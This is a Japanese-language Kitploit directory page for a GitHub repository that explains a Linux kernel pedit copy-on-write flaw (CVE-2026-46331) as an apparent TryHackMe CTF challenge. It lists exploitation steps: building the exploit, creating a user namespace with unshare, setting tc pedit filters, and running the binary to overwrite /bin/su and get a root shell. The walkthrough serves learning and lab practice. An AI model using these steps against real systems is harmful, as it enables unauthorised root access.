Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-46331-pedit-cow — pedit COW脆弱性(CVE-2026-46331)の解説とエクスプロイト手順 | Kitploit
ツール/GitHubGitHub/marwahhadi/cve-2026-46331-pedit-cow
特権昇格エクスプロイトCTF学習と教育バイナリエクスプロイト
GitHubmarwahhadi/cve-2026-46331-pedit-cow

CVE-2026-46331-pedit-cow

pedit COW脆弱性(CVE-2026-46331)の解説とエクスプロイト手順

リポジトリを見る
62ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-46331-pedit-cow

pedit COW 脆弱性(CVE-2026-46331)の解説と悪用手順。

概要

このチャレンジでは、traffic-control サブシステムのパケット編集アクション(act_pedit)における Linux カーネルの欠陥である pedit COW を実演します。この脆弱性により、非特権ユーザーが setuid-root バイナリのメモリ内コピーを上書きし、ディスク上のファイルに一切触れることなく実質的に root シェルを取得できます。

悪用手順

1. 初期セットアップ

環境は非特権ユーザー(karen)として開始されます。

id
cd ~/packet_edit_meme
make packet_edit_meme
  1. 権限昇格(ネームスペース作成) 通常、traffic-control の設定には CAP_NET_ADMIN 権限が必要ですが、一般ユーザーにはありません。私は非特権ユーザーネームスペースを使用してこの権限を取得しました。
unshare -r -n
  1. トラフィックコントロールアクションの設定 ネームスペース内で、clsact qdisc を設定し、pedit アクションをトリガーするフィルタを適用しました。

必要に応じて既存の設定をクリーンアップ

tc qdisc del dev lo clsact

qdisc とフィルタをセットアップ

tc qdisc add dev lo clsact
tc filter add dev lo egress matchall action pedit ex munge ip ttl set 64
  1. エクスプロイトの実行 環境を設定した後、root シェルを終了し、非特権ユーザーとしてエクスプロイトを実行しました。
exit
./packet_edit_meme
  1. 最終結果 エクスプロイトは /bin/su のエントリを上書きし、インタラクティブな root シェルを提供しました。
# cat /root/flag.txt

THM{YOUR_FLAG_HERE}

ツールをダウンロード